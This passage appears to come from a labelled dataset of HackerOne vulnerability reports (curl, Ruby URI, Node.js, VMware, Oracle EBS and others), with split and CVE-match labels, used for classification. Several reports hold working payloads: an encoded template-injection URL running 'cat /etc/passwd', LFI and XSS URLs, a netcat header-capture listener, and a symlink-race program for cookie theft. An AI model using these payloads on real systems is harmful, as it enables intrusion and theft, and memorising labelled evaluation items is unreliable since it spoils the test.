--oauth2-bearer anything`\n\nNote:\nThis vulnerability has been assigned CWE-305 \"Authentication Bypass by Primary Weakness\" that is not selectable on the current IBB form.\n\n## Impact\n\nUnauthorized access.", "source": "hackerone", "timestamp": "2022-04-29", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "2e3ede3df805014a5902", "text": "[Cross-site Scripting (XSS) - Reflected] XSS DUE TO CVE-2022-38463 in https://████████\n\n**Description:**\nDuring my research, I found one of the host running ServiceNow vulnerable to CVE-2022-38463 . ServiceNow through San Diego Patch 4b and Patch 6 allows reflected XSS in the logout functionality.\n\n## Impact\n\nAttacker is able to steal victims cookies, redirect victim to attacker controlled domain, and perform various malicious activities.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1.Enter the following crafted URL in any web-browser.\n\nhttps://█████████/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)\n\n2. XSS will be triggered.\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "ac42628b28b84ce77d61", "text": "[Unknown] URI parser's RFC3986 regular expression has poor performance when there are two # characters, leading to ReDoS\n\n## Summary\n\nHello team, I hope you're doing well! The `URI` parser mishandles invalid URLs that have two `#` characters. It does correctly identify that they're invalid, but the regex performs very poorly and execution time grows much faster than the string length.\n\nI found this somewhat accidentally when fuzzing for something else. I'm not sure if you care about such issues but I figured I'd report it anyway. The length of the strings required to actually cause the process to hang are very long, but it's not really an issue when the user-controlled input is sent in a request body.\n\n## Steps to reproduce\n\nRun the following script\n\n```ruby\nrequire 'benchmark'\nrequire 'uri'\n\ndef parse(n)\n URI('https://example.com/dir/' + 'a' * n + '/##.jpg')\n rescue URI::InvalidURIError\n # Invalid URI because of the two #\nend\n\nn = 50000\nBenchmark.bm(7) do |x|\n x.report('Base length') { parse(n) }\n x.report('Length x2 ') { parse(n * 2) }\n x.report('Length x4 ') { parse(n * 4) }\n x.report('Length x8 ') { parse(n * 8) }\nend\n```\n\nHere's the output on my machine\n\n```plaintext\n user system total real\nBase length 1.086961 0.003059 1.090020 ( 1.090500)\nLength x2 4.415046 0.000000 4.415046 ( 4.416986)\nLength x4 22.021462 0.003294 22.024756 ( 22.042507)\nLength x8 122.695223 0.006653 122.701876 (122.853669)\n```\n\nWe can see the execution time is roughly quintuples when the string length only doubles.\n\nHere's my Ruby version\n\n```shell\n$ ruby -v\nruby 3.1.0p0 (2021-12-25 revision fb4df44d16) [x86_64-linux]\n```\n\n## Impact\n\nHigh resource consumption, reduced performance, denial of service", "source": "hackerone", "timestamp": "2023-12-13", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "7c07a90ca8fd611351d1", "text": "[Unknown] no rate limit in forgot password session\n\nA little bit about Rate Limit:\nA rate limiting algorithm is used to check if the user session (or IP-address) has to be limited based on the information in the session cache.\nIn case a client made too many requests within a given timeframe, HTTP-Servers can respond with status code 429: Too Many Requests.\n## Description:-\nI have identified that when Forgetting Password for account , the request has no rate limit which then can be used to loop through one request. Which can be annoying to the root users sending mass password to one email\n\nSteps To Reproduce The Issue\n\nsetp1 - clik this link = https://www.yelp.com/login?return_url=https://www.yelp.com/seeyousoon?fsid=iY6PnT2UYrAnv0ASZEs3oQ\n\nStep 2- Intercept This Request In Burp And Forward Till You Found Your Number In Request Like\n\nPOST /j/collect?v=1&_v=j97&aip=1&a=1720823427&t=event&ni=1&_s=9&dl=https%3A%2F%2Fwww.yelp.com%2Flogin%3Freturn_url%3Dhttps%3A%2F%2Fwww.yelp.com%2Fseeyousoon%3Ffsid%3DiY6PnT2UYrAnv0ASZEs3oQ&ul=en-us&de=UTF-8&dt=Log%20In%20-%20Yelp&sd=24-bit&sr=1920x940&vp=1910x753&je=0&ec=New%20Signup&ea=signup%20click&el=submit%20forgot%20password&_u=SICAAAABAAAAAC~&jid=215130607&gjid=774412709&cid=AF761EB18AB1E206&tid=UA-30501-24&_gid=232424112.1664351398&_r=1&z=1311429197 HTTP/2\nHost: www.google-analytics.com\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/plain\nContent-Length: 0\nOrigin: https://www.yelp.com\nReferer: https://www.yelp.com/\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: cross-site\nTe: trailers\nConnection: close\n\nStep 3- Now Send This Request To Intruder And Repeat It 100 Time By Fixing Any Arbitrary Payload Which Doesn't No Effect Request I Choose Accept-Language: en-US,en;q=0.$5$\n\nStep 4 - See You Will Get 200 ok Status Code & 100 + Email In Your INBOX\nSee It Is Resulting In Mass Mailing Or Email Bombing To Your Users Which Is Bad For Business Impact\n\n\nI Will Recommend You To Add A ReCaptcha & Sort Of Something Which Requires Manual Human Interaction To Proceed Like You Can Add Captcha Like 2+2=_ so that it cannot be brute forced and you also can have a limit at the backend for particular number upto 5 times a day user can request Forget Password Email or Link something like that will prevent you from someone exploiting this vulnerability\n\n## Impact\n\nIf You Are Using Any Email Service Software API Or Some Tool Which Costs You For Your Email This Type Of Attack Can Result You In Financial Lose And It Can Also Slow Down Your Services It Can Take Bulk Of Storage In Sent Mail Although If Users Are Affected By This Vulnerability They Can Stop Using Your Services Which Can Lead To Business Risk", "source": "hackerone", "timestamp": "2022-09-29", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "063112e31459601e4f5e", "text": "[Unknown] [CPP]: Add query for CWE-805: Buffer Access with Incorrect Length Value using some functions\n\nThis bug was reported directly to GitHub Security Lab.", "source": "hackerone", "timestamp": "2023-06-13", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "77f63c32c7943a507de9", "text": "[Server-Side Request Forgery (SSRF)] [CVE-2022-35949]: undici.request vulnerable to SSRF using absolute / protocol-relative URL on pathname\n\nGHSA: https://github.com/nodejs/undici/security/advisories/GHSA-8qr4-xgw6-wmr3\n\nReport: https://hackerone.com/reports/1642017\n\n## Impact\n\nSSRF", "source": "hackerone", "timestamp": "2022-09-23", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "609b9cd2ee45040514cb", "text": "[Time-of-check Time-of-use (TOCTOU) Race Condition] CVE-2023-32001: fopen race condition\n\nAs we can see in the following curl code (line 59-61 https://github.com/curl/curl/blob/fb802b521af997230b65174a559f5c419520e142/lib/fopen.c ): \n```C\n if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {\n /* a non-regular file, fallback to direct fopen() */\n *fh = fopen(filename, FOPEN_WRITETEXT);\n...\n}\n...\n```\nThere is a race condition between the moment \"stat(filename, &sb)\" is executed and the moment \" fopen(filename, FOPEN_WRITETEXT);\" is executed.\nThis leads to undesirable behavior such as an attacker tricking a privileged user to overwrite protected files, or since this function (Curl_fopen) is also used for storing cookies an attacker could trick another user to send those cookies that might be very sensible to a file fully owned and controlled by the attacker.\n\n###POC/Steps to reproduce:\nBefore we start, I will be using a little program called \"rename\". Which simply swaps atomically the names of two files to be able to showcase this race condition. Here is its code :\n```\n#include \n#include \n#include \n#include \n#include \n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n\n// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c\nint main(int argc, char *argv[]) {\n while (1) {\n syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);\n }\n return 0;\n}\n```\n\nOpen two terminals, with two different users. One will be the attacker terminal and the other the victim. \nIn both POCs, the victim will want to execute a command such as \"curl --cookie-jar a google.com\" thinking the file \"a\" doesn't exist.\n\n###A) Exploiting this vulnerability to trick a user to overwrite a file they own:\n\nAssume the current directory of both attacker(selmelc) and victim (root) looks like this\n```SHELL\nlrwxrwxrwx 1 selmelc selmelc 4 Jun 27 07:11 a -> flag\ndrwxrwxrwx 2 selmelc selmelc 4096 Jun 27 07:11 b\n-rw-r--r-- 1 root root 6 Jun 27 07:05 flag\n-rwxr-x--- 1 selmelc selmelc 16608 Jun 27 07:04 rename\n```\nThe attacker executes ./rename a b, which will not stop to swap the name of the directory \"b\" and the symlink \"a\". \n\nThe victim executes their command \"curl --cookie-jar a google.com\".\nThe race condition is successfully exploited if in the vulnerable code the stat identifies the file \"a\" as a directory and then the \"fopen\" opens the symlink that points to the file \"flag\".\nIf that happened then the results looks like this :\n```\n...\n-rw-r--r-- 1 root root 131 Jun 27 07:13 flag\n...\nroot@deb:/home/selmelc/Documents# cat flag\n# Netscape HTTP Cookie File\n# https://curl.se/docs/http-cookies.html\n# This file was generated by libcurl! Edit at your own risk.\n```\nAdditional note: \nYou might think \"well that's just how symlinks work\"... To clarify on that, by default if the victim was executing \"curl --cookie-jar a google.com\" without the attacker exploiting the vuln. a different behavior would occur ; the file \"a\" would be erased (no more symlink) and overwritten as a regular file containing the cookie data. This happens because the stat function follows symbolic links therefore in that scenario we would not enter the vulnerable condition which leads to the race condition.\n\n###B) Exploiting this vulnerability to steal the victim's cookies and hide it from them:\n\nAs this uses the same logic as the previous exploit for this vuln. Repeat same steps except this time we want the \"flag\" file to be owned by the attacker as following:\n```\nlrwxrwxrwx 1 selmelc selmelc 4 Jun 27 08:42 a -> flag\ndrwxrwxrwx 2 selmelc selmelc 4096 Jun 27 08:41 b\n-rw--w--w- 1 selmelc selmelc 0 Jun 27 08:41 flag\n-rwxr-x--- 1 selmelc selmelc 16608 Jun 27 07:04 rename\n\n```\nNormal curl behavior after the victim executed \"curl --cookie-jar a google.com\" :\n```\n-rw------- 1 root root 131 Jun 27 08:49 a\ndrwxrwxrwx 2 selmelc selmelc 4096 Jun 27 08:41 b\n-rw--w--w- 1 selmel", "source": "hackerone", "timestamp": "2023-07-25", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "bab86d9c746604748739", "text": "[Path Traversal] Access to admininstrative resources/account via path traversal\n\n**Description:**\nA user can login as an administrator without the need of an ██████████ account, or an authenticated user can access and manipulate administrative resources without needing to login as an administrator. An ████████ (███████) account is required.\n## References\n\n## Impact\n\nExfiltration of sensitive data (IPs, system configurations, passwords, usernames, email addresses, names), website defacing, denial of service, potential rce, deletion of data.\n\n## System Host(s)\n████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nIf you do not have an ██████(██████████) account:\n\nNavigate to https://██████/\nLogin using your ████████ account. \nWhen you login you should be at the page https://██���███/Saba/██████/CustomLogin.jsp with the error \"There was an error while processing your request. Please try again. If the problem persists, please contact the help desk at ████████\".\nNavigate to https://█████████/home\nYour account name should say \"Samba administrator\"\n\nIf you do have an █████████(███████) account:\n\nNavigate to https://█████/\nLogin using your ███████ account. \nNavigate to a page in the admin directory i.e. https://███████/Saba/Web_wdk/████████/platform/system/admin/systemMain.rdf or https://██████████/Saba/Web_wdk/███████/Platform/system/admin/usersStatistics.rdf\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2022-09-06", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "6ec2cee887eb79b018f9", "text": "[Insufficiently Protected Credentials] CVE-2022-27776: Auth/cookie leak on redirect\n\n## Summary:\ncurl/libcurl can be coaxed to leak Authorization / Cookie headers by redirecting request to http:// URL on the same host. Successful exploitation requires that the attacker can either Man-in-the-Middle the connection or can access the traffic at the recipient side (for example by redirecting to a non-privileged port such as 9999 on the same host).\n\n## Steps To Reproduce:\n\n1. Configure for example Apache2 to perform redirect with mod_rewrite:\n ```\n RewriteCond %{HTTP_USER_AGENT} \"^curl/\"\n RewriteRule ^/redirectpoc http://hostname.tld:9999 [R=301,L]\n ```\n ... the attacker could also use `.htpasswd` file to do so.\n 2. Set up netcat to listen for the incoming secrets:\n `while true; do echo -ne 'HTTP/1.1 404 nope\\r\\nContent-Length: 0\\r\\n\\r\\n' | nc -v -l -p 9999; done`\n 3. `curl-L -H \"Authorization: secrettoken\" -H \"Cookie: secretcookie\" https://hostname.tld/redirectpoc`\n \nThe redirect will be followed, and the confidential headers sent over insecure HTTP to the specified port:\n```\nGET / HTTP/1.1\nHost: hostname.tld:9999\nUser-Agent: curl/7.83.0-DEV\nAccept: */*\nAuthorization: secrettoken\nCookie: secretcookie\n```\n\nThe attack could also use HTTPS and a valid certificate, In this case the leaked headers are of course only be visible to the listening http server.\n\nThis vulnerability is quite similar to `CVE-2022-27774` and the fix is similar too: If the protocol or port number differs from the original request strip the Authorization and Cookie headers.\n\nThis bug appears to be at: \n- https://github.com/curl/curl/blob/94ac2ca7754f6ee13c378fed2e731aee61045bb1/lib/http.c#L1904\n- https://github.com/curl/curl/blob/94ac2ca7754f6ee13c378fed2e731aee61045bb1/lib/http.c#L850\n\n## Impact\n\nLeak of Authorization and/or Cookie headers.", "source": "hackerone", "timestamp": "2022-04-29", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "8b05d940523f738cc590", "text": "[Use After Free] CVE-2023-28319: UAF in SSH sha256 fingerprint check\n\nlibcurl offers a feature to verify an SSH server's public key using a SHA 256\nhash. When this check fails, libcurl would free the memory for the fingerprint\nbefore it returns an error message containing the (now freed) hash.\n\nAffected versions: curl 7.81.0 to and including 8.0.1\nNot affected versions: curl < 7.81.0 and curl >= 8.1.0\n\nThe original submission can be found here: https://hackerone.com/reports/1913733\n\n## Impact\n\nThis flaw risks inserting sensitive heap-based data into the error message\nthat might be shown to users or otherwise get leaked and revealed.", "source": "hackerone", "timestamp": "2023-06-25", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "3ef86a6792ab0aba5767", "text": "[Unknown] Yet another SSRF query for Javascript\n\nThis bug was reported directly to GitHub Security Lab.", "source": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "611fa8e438da92a4b9f7", "text": "[Path Traversal] Permission model improperly protects against path traversal in Node.js 20\n\n**Summary:** A previously disclosed vulnerability (CVE-2023-30584) was patched insufficiently in commit [205f1e6](https://github.com/nodejs/node/commit/205f1e643e25648173239b2de885fec430268492). The new path traversal vulnerability arises because the implementation does not protect itself against the application overwriting built-in utility functions with user-defined implementations.\n\n**Description:** The function `possiblyTransformPath` calls `pathModule.resolve(path)`, where `pathModule` is the result of `require('path')`. Application code may replace the value of the `require('path').resolve`property with a user-defined function that does not resolve `/../` within any given path. Because `possiblyTransformPath` retrieves the value of the `pathModule.resolve` property dynamically, it will use the user-defined function instead of the built-in function and will thus fail to fully resolve the path given by the application. The vulnerability can be prevented by maintaining a reference to the original value of `pathModule.resolve` for use in `possiblyTransformPath`, assuming that the original implementation of the `resolve()` function is not subject to any such vulnerabilities itself.\n\n## Steps To Reproduce:\n\nTemporarily assigning `path.resolve = (s) => s` disables the resolution of `/../` within the permission model implementation.\n\n```console\n$ node --experimental-permission --allow-fs-read=/tmp/ -p \"path.resolve = (s) => s; fs.readFileSync('/tmp/../etc/passwd')\"\n\n```\n\n## Supporting Material/References:\n\n* [Original HackerOne report 2092852 of this vulnerability](https://hackerone.com/reports/2092852)\n* [HackerOne report 1952978](https://hackerone.com/reports/1952978) for the previous path traversal vulnerability (CVE-2023-30584)\n* [Vulnerable implementation of `possiblyTransformPath`](https://github.com/nodejs/node/blob/af4cdcde154be58fc47b389670efbe10da489923/lib/internal/fs/utils.js#L711-L718)\n\n## Suggested patch\n\n```patch\ndiff --git a/lib/internal/fs/utils.js b/lib/internal/fs/utils.js\nindex b7354e30e9..4971656d0a 100644\n--- a/lib/internal/fs/utils.js\n+++ b/lib/internal/fs/utils.js\n@@ -710,2 +710,3 @@ const validatePath = hideStackFrames((path, propName = 'path') => {\n // The permission model needs the absolute path for the fs_permission\n+const resolvePath = pathModule.resolve;\n function possiblyTransformPath(path) {\n@@ -713,3 +714,3 @@ function possiblyTransformPath(path) {\n if (typeof path === 'string') {\n- return pathModule.resolve(path);\n+ return resolvePath(path);\n }\n```\n\nThis patch assumes that `pathModule.resolve()` itself is not susceptible to having its behavior altered in a security-critical way through user-defined properties.\n\nThis patch was merged into the main branch of Node.js as [commit 32bcf4ca](https://github.com/nodejs/node/commit/32bcf4ca27bba9d4e48418f12dc6d7c2252e71ec) and into the Node.js 20 release line as [commit cd352751](https://github.com/nodejs/node/commit/cd352751118eccab625573092bf47d9b0d84b792).\n\n## Impact\n\nThe impact is almost identical with that of CVE-2023-30584. Applications may use this vulnerability to read and write files and directories that the user has not granted access to.", "source": "hackerone", "timestamp": "2023-11-30", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "e7c56ffa3c1100f4e148", "text": "[Improper Certificate Validation] CVE-2023-28321: IDN wildcard match\n\n## Summary:\ncurl /libcurl uses wildcards for validation during TLS communication, even if the hostname is an IDN.\nEven if wildcards are present in the CN/SAN of the certificate, they must not be used to match if the hostname is an IDN.\nThis is described in [RFC-6125, section 6.4.3.][RFC]\n[RFC]: https://datatracker.ietf.org/doc/html/rfc6125#section-6.4.3\nYou probably know that.\nHowever, there was a problem with the implementation.\n`lib/vtls/hostcheck.c` in the function 'hostmatch' on lines 100-106.\n\n```\n /* We require at least 2 dots in the pattern to avoid too wide wildcard\n match. */\n pattern_label_end = memchr(pattern, '.', patternlen);\n if(!pattern_label_end ||\n (memrchr(pattern, '.', patternlen) == pattern_label_end) ||\n strncasecompare(pattern, \"xn--\", 4))\n return pmatch(hostname, hostlen, pattern, patternlen);\n```\nI think `strncasecompare(pattern, \"xn--\", 4))` is `strncasecompare(hostname, \"xn--\", 4))`.\n`pattern` is a value that contains wildcards because it is CN/SAN.\nIn other words, it will not match \"xn--\" because it will be a string containing wildcards.\n\n## Steps To Reproduce:\n 1. Create a wildcard certificate.As an example, attach a certificate and private key with CN value of `x*.example.local`. {F2298301} {F2298300}\n 2. `openssl s_server -accept 443 -cert server.crt -key server.key -www`\n 3. Modify hosts so that the name resolution result of `xn--l8j.example.local‘ is the IP of your machine in order to perform the test in the local environment.\n4. `curl https://%E3%81%82.example.local --cacert server.crt`\n\nWhen the above is executed, the communication succeeds even though it should result in a validation error.\n\n## Impact\n\nImproper Validation of Certificate with Host Mismatch.", "source": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "74f318cb28658b705f69", "text": "[Uncontrolled Resource Consumption] CVE-2023-28755: ReDoS vulnerability in URI\n\nOriginal report on the Ruby program: https://hackerone.com/reports/1444501\nAdvisort: https://www.ruby-lang.org/en/news/2023/03/28/redos-in-uri-cve-2023-28755/\nNIST entry: https://nvd.nist.gov/vuln/detail/CVE-2023-28755\nCVSS: 7.5 high `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` as listed by NIST but frankly I disagree with the `UI:N` part, I won't mind the extra 2k if you go with NIST but it didn't feel right not to mention it :) I filed the report with the CVSS I think this should have\n\nCopy of the original report:\n\n## Summary\n\nHello team, I hope you're doing well! The `URI` parser mishandles invalid URLs that have two `#` characters. It does correctly identify that they're invalid, but the regex performs very poorly and execution time grows much faster than the string length.\n\nI found this somewhat accidentally when fuzzing for something else. I'm not sure if you care about such issues but I figured I'd report it anyway. The length of the strings required to actually cause the process to hang are very long, but it's not really an issue when the user-controlled input is sent in a request body.\n\n## Steps to reproduce\n\nRun the following script\n\n```ruby\nrequire 'benchmark'\nrequire 'uri'\n\ndef parse(n)\n URI('https://example.com/dir/' + 'a' * n + '/##.jpg')\n rescue URI::InvalidURIError\n # Invalid URI because of the two #\nend\n\nn = 50000\nBenchmark.bm(7) do |x|\n x.report('Base length') { parse(n) }\n x.report('Length x2 ') { parse(n * 2) }\n x.report('Length x4 ') { parse(n * 4) }\n x.report('Length x8 ') { parse(n * 8) }\nend\n```\n\nHere's the output on my machine\n\n```plaintext\n user system total real\nBase length 1.086961 0.003059 1.090020 ( 1.090500)\nLength x2 4.415046 0.000000 4.415046 ( 4.416986)\nLength x4 22.021462 0.003294 22.024756 ( 22.042507)\nLength x8 122.695223 0.006653 122.701876 (122.853669)\n```\n\nWe can see the execution time is roughly quintuples when the string length only doubles.\n\nHere's my Ruby version\n\n```shell\n$ ruby -v\nruby 3.1.0p0 (2021-12-25 revision fb4df44d16) [x86_64-linux]\n```\n\n## Impact\n\nHigh resource consumption, reduced performance, denial of service", "source": "hackerone", "timestamp": "2023-04-26", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "74b112b0237a3a07eed8", "text": "[Cross-site Scripting (XSS) - Stored] XSS exploit of RDoc documentation generated by rdoc (CVE-2013-0256)\n\nThe exploit exists in `paragraph` formatting that allows malicious code to be injected into the generated documentation.\n\nPoC\n----\n\nFor example, let's create the `example` file with the following content:\n```\n\\x[\\\\]\n```\n\nNow, run rdoc:\n```sh\nrdoc --all\n```\n\nThe output html will have the following injected javascript code:\n```html\n
    \n\n

    x[]

    \n\n
    \n```\n\nSolution\n--------\n\nI may be wrong with the solution, but I want to be more helpful :) At first glance, the vulnerable code is here:\n```rb\n def accept_paragraph paragraph\n @res << \"\\n

    \"\n text = paragraph.text @hard_break\n text = text.gsub(/\\r?\\n/, ' ')\n @res << to_html(text) # <====== CGI.escapeHTML(text)) ???\n @res << \"

    \\n\"\n end\n```\nI suppose we should sanitize the output. For example, after changing `text` to `CGI.escapeHTML(text)` I've got the following result:\n\n```html\n
    \n\n

    x[<script>alert(1);</script>]

    \n\n
    \n```\nI hope this doesn't break anything. ^_^\n\n## Impact\n\nA cross-site scripting (XSS) vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload.", "source": "hackerone", "timestamp": "2023-07-18", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "aed5ab7816f6545c9cd4", "text": "[Uncontrolled Resource Consumption] Slowvote and Countdown can cause Denial of Service due to recursive inclusion\n\nSimilar to #85011, if you edit a Slowvote or Countdown object and include its own object ID in the description, then it will recursively include and prevent the page from loading.\n\nmongoose\n\n## Impact\n\nDenial of Service. You can include the Slowvote or Countdown object on any other object to also prevent it from loading. If it is included in the feed, you could also prevent the home page from loading.", "source": "hackerone", "timestamp": "2022-05-09", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "b3cf9bbf347ab8467edb", "text": "[Code Injection] ██████████ vulnerable to CVE-2022-22954\n\nI found that one of the targets belongs to **DOD** vulnerable to **CVE-2022-22954** where an attacker may be able to execute any malicious code like escalating Remote code execution is also possible \n\n**Technical Summary:**\n\nCVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager. This vulnerability was assigned a CVSSv3 score of 9.8. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. Successful exploitation could result in remote code execution by exploiting a server-side template injection flaw.\n\n**Vulnerable URL:**\n\nhttps://████/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d\n\n## Impact\n\nThe impact of server-side template injection vulnerabilities is generally critical, resulting in remote code execution by taking full control of the back-end server. Even without the code execution, the attacker may be able to read sensitive data on the server\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\nVMware workspace One\n\n## CVE Numbers\nCVE-2022-22954\n\n## Steps to Reproduce\n* Visit the vulnerable URL **https://████** and Intercept the request in burp suite\n* Append the following endpoint **/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d** and analyze the response you will see the contents of **/etc/passwd**\n\n**Request:**\n\n```\nGET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d HTTP/1.1\nHost: █████████\nCookie: LOGIN_XSRF=NSlYKinVNwgOtuT; JSESSIONID=A86B60C5FD0B58346764D1FB01DAF155\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: none\nSec-Fetch-User: ?1\nCache-Control: max-age=0\nTe: trailers\nConnection: close\n```\n\n**Response:**\n\n```\nHTTP/1.1 400 \nVary: Origin\nVary: Access-Control-Request-Method\nVary: Access-Control-Request-Headers\nSet-Cookie: EUC_XSRF_TOKEN=6386e149-ff55-4a34-b474-30e6c0c62299; Path=/catalog-portal; Secure\nCache-Control: no-cache,private\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains\nX-Frame-Options: SAMEORIGIN\nContent-Type: text/html;charset=UTF-8\nContent-Language: en-US\nDate: Mon, 11 Apr 2022 15:03:40 GMT\nConnection: close\nContent-Length: 3576\n\n\n\n\n Error Page\n \n \n \n\n## Supporting Material/References:\nhttps://security.snyk.io/vuln/SNYK-JS-JQUERY-567880\nhttps://github.com/TIBCOSoftware/Augmented-Reality/issues/65\nhttps://www.exploit-db.com/exploits/49766\nhttps://www.cybersecurity-help.cz/vdb/SB2020042126\n\n * [attachment / reference]\n\n## Impact\n\nCross site scripting attacks can have devastating consequences. Code injected into a vulnerable application can exfiltrate data or install malware on the user’s machine. Attackers can masquerade as authorized users via session cookies, allowing them to perform any action allowed by the user account.", "source": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "135ae5024b5afa6b530b", "text": "[PHP Local File Inclusion] Local File Read vulnerability on ██████████ [HtUS]\n\nKindly check screenshot ██���████: In case if scope question. Because i picked this site from DOD website list under 'dod sites'. Lets move on to the bug now :)\n\n## Summary:\nLocal File Include vulnerability on ███. Oracle Ebs Bispgrapgh is prone to a directory traversal vulnerability that can be exploited by remote attackers to access sensitive data on the server.\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. to view /etc/passwd file visit https://██████/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/\n 2. to view /etc/motd file visit https://██████████/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=motd&ifl=/etc/\n 3. to view /etc/profile visit https://██████/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=profile&ifl=/etc/\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n* █████:\n* █████:\n* https://web.cystack.net/vulnerability/cystack.remote.oracle_ebs_bispgrapgh_file_read\n\n## Impact\n\nAn attacker could read local files on the web server that they would normally not have access to, such as the application source code or configuration files containing sensitive information on how the website is configured.", "source": "hackerone", "timestamp": "2023-01-06", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "efc50de17254f6b5392f", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2022-32205: Set-Cookie denial of service\n\n## Summary:\nCurl fails to limit the number of cookies that can be set by a single host/domain. It can easily lead to a situation where constructing the request towards a host will end up consuming more than `DYN_HTTP_REQUEST` memory, leading to instant `CURLE_OUT_OF_MEMORY`.\n\nAny host in a given domain can target any other hosts in the same domain by using domain cookies. The attack works from both `HTTP` and `HTTPS` and from unprivileged ports.\n\n## Steps To Reproduce:\n 1. Run the following python web server:\n```\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nclass MyServer(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n for i in range(0,256):\n self.send_header(\"Set-Cookie\", \"f{}={}; Domain=hax.invalid\".format(i, \"A\" * 4092))\n self.end_headers()\n\nif __name__ == \"__main__\":\n webServer = HTTPServer((\"127.0.0.1\", 9000), MyServer)\n try:\n webServer.serve_forever()\n except KeyboardInterrupt:\n pass\n webServer.server_close()\n ```\n 2. `curl -c cookie.txt -b cookie.txt --connect-to evilsite.hax.invalid:80:127.0.0.1:9000 http://evilsite.hax.invalid/`\n 3. `curl -c cookie.txt -b cookie.txt --connect-to targetedsite.hax.invalid:80:127.0.0.1:9000 http://targetedsite.hax.invalid/`\n\nThis is CWE-770: Allocation of Resources Without Limits or Throttling\n\n# Remediation ideas\nThe cookie matching being as complicated as it is makes it a bit hard to create a fix that always works fine. The request inhabits other headers as well as the cookies, so the amount of storage available for the cookies also varies per request.\n\nOne relatively \"easy\" way to mitigate this would be to limit the amount of domain cookies a domain can have. But what should be done if `Set-Cookie` would go over this limit? Maybe flush the oldest cookies?\n\n## Impact\n\nDenial of service", "source": "hackerone", "timestamp": "2022-06-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "bc640b61ca4ac216da8f", "text": "[Improper Access Control - Generic] DNS rebinding in --inspect (insufficient fix of CVE-2022-32212 affecting macOS devices)\n\nThe fix for CVE-2022-32212, covered the cases for routable IP addresses, however, there exists a specific behavior on macOS devices when handling the `http://0.0.0.0` URL that allows an attacker-controlled DNS server to bypass the DNS rebinding protection by resolving hosts in the `.local` 